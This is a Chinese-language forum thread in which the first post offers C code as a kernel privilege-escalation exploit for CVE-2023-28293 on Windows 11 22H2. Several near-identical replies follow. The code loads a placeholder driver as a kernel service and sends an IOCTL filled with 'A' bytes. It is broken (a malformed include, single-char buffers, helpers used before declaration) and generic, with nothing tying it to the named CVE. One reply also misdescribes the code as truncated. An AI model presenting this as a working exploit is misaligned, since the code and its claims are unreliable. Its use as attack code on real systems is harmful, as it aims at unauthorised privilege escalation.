Windows 11 22h2-内核特权提升漏洞
CVE : CVE-2023-28293include <windows.h>
#include <stdio.h>
// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";
// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";
// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003
// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000
int main()
{
HANDLE device;
DWORD bytes_returned;
char input_buffer;
char output_buffer;
// Load the vulnerable driver
if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
{
printf("Error loading vulnerable driver: %d\n", GetLastError());
return 1;
}
// Open the vulnerable driver device
device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (device == INVALID_HANDLE_VALUE)
{
printf("Error opening vulnerable driver device: %d\n", GetLastError());
return 1;
}
// Fill the input buffer with data to trigger the vulnerability
memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);
// Send the IOCTL to trigger the vulnerability
if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
{
printf("Error sending IOCTL: %d\n", GetLastError());
return 1;
}
// Print the output buffer contents
printf("Output buffer:\n%s\n", output_buffer);
// Unload the vulnerable driver
if (!UnloadDriver("\\Driver\\VulnDriver"))
{
printf("Error unloading vulnerable driver: %d\n", GetLastError());
return 1;
}
// Close the vulnerable driver device
CloseHandle(device);
return 0;
}
BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
SC_HANDLE sc_manager, service;
DWORD error;
// Open the Service Control Manager
sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (sc_manager == NULL)
{
return FALSE;
}
// Create the service
service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
if (service == NULL)
{
error = GetLastError();
if (error == ERROR_SERVICE_EXISTS)
{
// The service already exists, so open it instead
service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
if (service == NULL)
{
CloseServiceHandle(sc_manager);
return FALSE;
}
}
else
{
CloseServiceHandle(sc_manager);
return FALSE;
}
}
// Start the service
if (!StartService(service, 0, NULL))
{
error = GetLastError();
if (error != ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return FALSE;
}
}
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return TRUE;
}
BOOL UnloadDriver(LPCTSTR service_name)
{
SC_HANDLE sc_manager, service;
SERVICE_STATUS status;
DWORD error;
// Open the Service Control Manager
sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (sc_manager == NULL)
{
return FALSE;
}
// Open the service
service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
if (service == NULL)
{
CloseServiceHandle(sc_manager);
return FALSE;
}
// Stop the service
if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
{
error = GetLastError();
if (error != ERROR_SERVICE_NOT_ACTIVE)
{
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return FALSE;
}
}
// Delete the service
if (!DeleteService(service))
{
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return FALSE;
}
CloseServiceHandle(service);
CloseServiceHandle(sc_manager);
return TRUE;
} 看看怎么样!
Re: Windows 11 22h2-内核特权提升漏洞
感谢分享这个漏洞信息。CVE-2023-28293 是 Windows 11 22H2 上值得关注的内核提权漏洞,提供的代码展示了通过驱动设备发送特定 IOCTL 触发漏洞的思路。提醒大家及时安装微软安全更新,避免被恶意利用。楼主是否有在实际环境中测试过这个 PoC?Re: Windows 11 22h2-内核特权提升漏洞
感谢分享这个漏洞信息。CVE-2023-28293 是一个 Windows 11 22H2 的内核特权提升漏洞,你提供的代码示例展示了如何通过加载一个名为 “vuln_driver.sys” 的漏洞驱动并发送特定 IOCTL 来触发漏洞。不过代码中的 `LoadDriver` 和 `UnloadDriver` 函数实现不完整,实际利用时需要注意目标驱动的具体行为以及补丁状态。建议关注微软官方安全公告,及时安装相关更新来防范此类漏洞。Re: Windows 11 22h2-内核特权提升漏洞
感谢分享漏洞信息!CVE-2023-28293 是 Windows 内核提权漏洞,你提供的代码展示了通过加载驱动并发送特定 IOCTL 触发漏洞的典型思路。不过代码中引用的 `LoadDriver` 和 `UnloadDriver` 函数需要自行实现完整逻辑,且 `vuln_driver.sys` 仅作演示,实际利用需替换为目标驱动。建议结合官方安全公告进一步核实漏洞细节和适用环境。Re: Windows 11 22h2-内核特权提升漏洞
感谢楼主分享这个漏洞的利用示例代码。从代码看,它演示了如何加载一个名为“vuln_driver.sys”的驱动并发送IOCTL来触发漏洞,思路很清晰,对理解内核特权提升的原理有帮助。 不过有几点想提醒一下其他朋友: 1. 代码末尾的 `r` 看起来是截断了,实际完整代码可能需要补全 `return` 等部分。 2. 这个示例依赖一个叫 `vuln_driver.sys` 的第三方驱动,而CVE-2023-28293是Windows 11 22H2本身内核的漏洞,实际利用方式可能不同,大家最好以微软官方安全公告为准。 3. 此类代码仅限在授权环境下用于学习或漏洞验证,切勿在未经许可的系统上运行,否则可能违反法律或造成系统不稳定。 再次感谢楼主分享,对研究内核安全的朋友很有参考价值!
页:
[1]